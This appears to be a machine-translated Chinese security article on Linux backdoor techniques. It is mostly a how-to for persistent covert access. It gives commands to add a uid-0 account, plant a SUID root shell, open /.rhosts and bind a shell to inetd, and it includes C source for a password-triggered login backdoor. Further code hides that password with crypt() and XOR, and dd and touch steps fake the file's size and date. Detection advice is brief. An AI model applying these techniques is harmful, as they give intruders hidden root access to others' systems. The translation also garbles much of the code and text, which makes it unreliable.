Analysis of Linux Backdoor techniques and practices-the vulnerability of early warning-the black bar safety net

ID MYHACK58:62200717899
Type myhack58
Reporter 佚名
Modified 2007-12-24T00:00:00


| | Page 1 of: analysis of the Linux Backdoor technique and practice methods


The back door introduction

The intruder complete control of the system, to facilitate the next time you enter and use a technology. Generally by modifying system configuration files and installation of third-party back-door tool to achieve. Has a hidden, can bypass the system log, not easy to be the system administrator find and other characteristics.

Common Backdoor technology

Increase in the super user account Hack/Sniffer user password Placed the SUID Shell rhosts + + The use of the system service program TCP/UDP/ICMP Shell Crontab timing task The shared library file Toolkit rootkit Loadable kernel module(LKM)

Increase super user

echo "e4gle:x:0:0::/:/bin/sh" >>

the /etc/passwd

echo "e4gle::-1:-1:-1:-1:-1:-1:5 0 0" >>

/etc/shadow If the system does not allow the uid=0 user-Telnet, Also need to add a normal user account.

Hack/Sniffer user password

Get the shadow file with John the Ripper Tools to crack weak user passwords. Install sniffit and other sniffing tools that monitor the telnet, ftp, etc. Port, collect the user's password.

Placed the SUID Shell

cp /bin/bash /dev/. rootshell

chmod u+s /dev/. rootshell

Ordinary user on the machine running the/dev/. rootshell, i.e. You can get a root access shell.

rhosts + +

echo "+ +" > /. rhosts

rsh-l root csh-i

The remote can get a rootshell on.

The use of the system service program

Modify the/etc/inetd. conf daytime stream tcp nowait /bin/sh sh-I With the backdoor program the replacement in. telnetd, in. rexecd, etc. 't inted to the service program Redirect the login program


BindShell, mostly based on TCP/UDP Protocol The network service program, in high-port listening, it's easy Be found. Ping Backdoor, through the ICMP packet activated Backdoor Forming a Shell channel. TCP ACK data packet to the back door, can through the fire Wall.

Crontab timing task

Crontab Scheduler installed backdoors The timing of the run, usually late in the evening period, is a system management Member is not in the line of time.

The shared library file

In the shared library to embed a backdoor function Use the backdoor password to activate the Shell, get permission To be able to Dodge the system administrator of the binary file itself Check

Toolkit rootkit

Contains a series of system and back door tools: - Clear the log in the log recording - Camouflage checksum - Replace netstat, ps and other network tools - Back-door login program Easy to install and use

Loadable kernel module(LKM)

LKM: the Loadable Kernel Modules Dynamic loading does not need to re-compile the kernel. Intercepted system call, with the hidden directories, files, into Threads, network connections and other great features. Its good concealment, found that greater difficulty. Famous LKM package there are adore and knark is.

Backdoor detection

In your own experience, combined with a specific tool, hand made Some of the testing. Use Tripwire or md5 checksum to check the system. By means of the IDS system, The monitor to the target machine of the suspicious network Network connection.

Instance: login Backdoor

The intruder put the original/bin/login backup, and then use a Section of the program to replace/bin/login. The intruder telnet login Come in time, by environment variables or the terminal type Pass the correct Backdoor password, it will directly get a Shell; if it is a normal user login will be re-set To the to the original login file, and to process the normal. Record. The most simple login Backdoor ulogin. c source code as follows:

Instance: login Backdoor

include <stdio. h>

define PASSWORD "passWORD"

define _PATH_LOGIN "/sbin/logins"

main (argc, argv, envp) int argc; char argv, envp; { char *display = getenv("DISPLAY"); if ( display == NULL ) { execve(_PATH_LOGIN, argv, envp); perror(_PATH_LOGIN); exit(1); } if (! strcmp(display,PASSWORD)) { system("/bin/csh"); exit(1); } execve(_PATH_LOGIN, argv, envp); exit(1); }

| Page 2: analysis of the Linux Backdoor technique and practice methods


Using the back door login

First, the Telnet service is open, on your own machine: bash$Content$nbsp;export DISPLAY=passWORD bash$Content$nbsp;telnet Trying xxx. xxx. xxx. xxx... Connected to (xxx. xxx. xxx. xxx). Escape character is ’^]’. % _

the strings command

the strings command can print out binary file can be displayed in String used to earlier ulogin program: bash$Content$nbsp;strings ulogin /lib/ld-linux. so. 2 .............. DISPLAY /sbin/logins passWORD /bin/csh

The encrypted Backdoor password(1)

1, The use of the DES algorithm, i.e., the crypt( )function, write the gen. c Program:

include <unistd. h>

main(int argc, char *argv[]) { if (argc != 3) { printf("usage: %s <password> <salt>\n", argv[0]); exit(1); } printf("%s\n", crypt(argv[1], argv[2])); }

The encrypted Backdoor password(1)

2, compiled for gen, execute./ gen hack the ui, to give the shadow junction If UiVqMWvDrIQjA it. 3, modify the back door of the source program ulogin. c: -- In ciphertext form of the password instead of ulogin. c define a macro PASSWORD value. -- If the backdoor password is correct, given directly to the Shell: if (! strcmp(PASSWORD, crypt(display,PASSWORD))) { system(SHELL); exit(1); } Using strings command can only see the encrypted password.

The encrypted Backdoor password(2)

Using exclusive-or XOR algorithm To a hexadecimal representation string, in order to achieve non- printable effect 1, the encoding program encode. c as follows:

The encrypted Backdoor password(2)

char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a"; char de(char str,char key) { int i=0,j=0,len; len=strlen(key); while(str[i] != ’\0’) { str[i]^=key[j]; j++; if(j==len) j=0; i++; } return str; } void display(char str) { int i; for(i=0;i<strlen(str);i++) printf("\\x%x",str[i]); printf("\n"); } main() { char gets[1 0 0], *ptr; ptr=gets; scanf ("%s",ptr); de(ptr,magic);display(ptr); }

The encrypted Backdoor password(2)

2, the compiler encode, followed by the implementation to get the key character String with the magic string after the XOR result, e.g., the original login below File name/sbin/xlogin, after the exclusive or is: \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb 3, After source code for this definition: Char login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x 1 3\xb"; Then insert the XOR function char *de()combined with the same magicString, you can determine the correct Backdoor password. Use the strings command to see the password, path, etc. string.

Last modified(1)

So that the backdoor ulogin strings output similar to the forward Often the login of the strings output, the practice is: In ulogin. c code to add a string array char strings []=""; in quotation marks fill in the normal the login program strings outputs the result. To the real ones, to increase confuse resistance.

Last modified(2)

Adjust the backdoors of the File date, size, etc. attributes: 1, Date

ls-l /sbin/xlogin

-r-sr-xr-x-root root 1 9 3 0 0 Feb 1 1 1 9 9 8 /sbin/xlogin

touch-t 1 9 9 8 0 2 1 1 0 0 0 0 ulogin


Last modified(2)

2, Adjust the size

ls-l ulogin /sbin/xlogin

-r-sr-xr-x root root 7 5 4 2 Feb 1 1 1 9 9 8 ulogin -r-sr-xr-x-root root 1 9 3 0 0 Feb 1 1 1 9 9 8 /sbin/xlogin


19300-7542 1 1 7 5 8

dd if=/sbin/xlogin of=/tmp/t bs=1 1 7 5 8 count=1

1+0 records in 1+0 records out 1 1 7 5 8 bytes transferred in 0.000379 secs (3 1 0 1 6 7 4 6 bytes/sec)

cat /tmp/t >> ulogin

Login Backdoor detection

Use the command md5sum on the existing/bin/login file as Check with previous values for comparison. Using the Red Hat Linux RPM check:

rpm-V util-linux

The intruder has been using the back door login in the case, who is the invisible user, view system processes, check the Looking for login-h xxx. xxx. xxx. xxx words.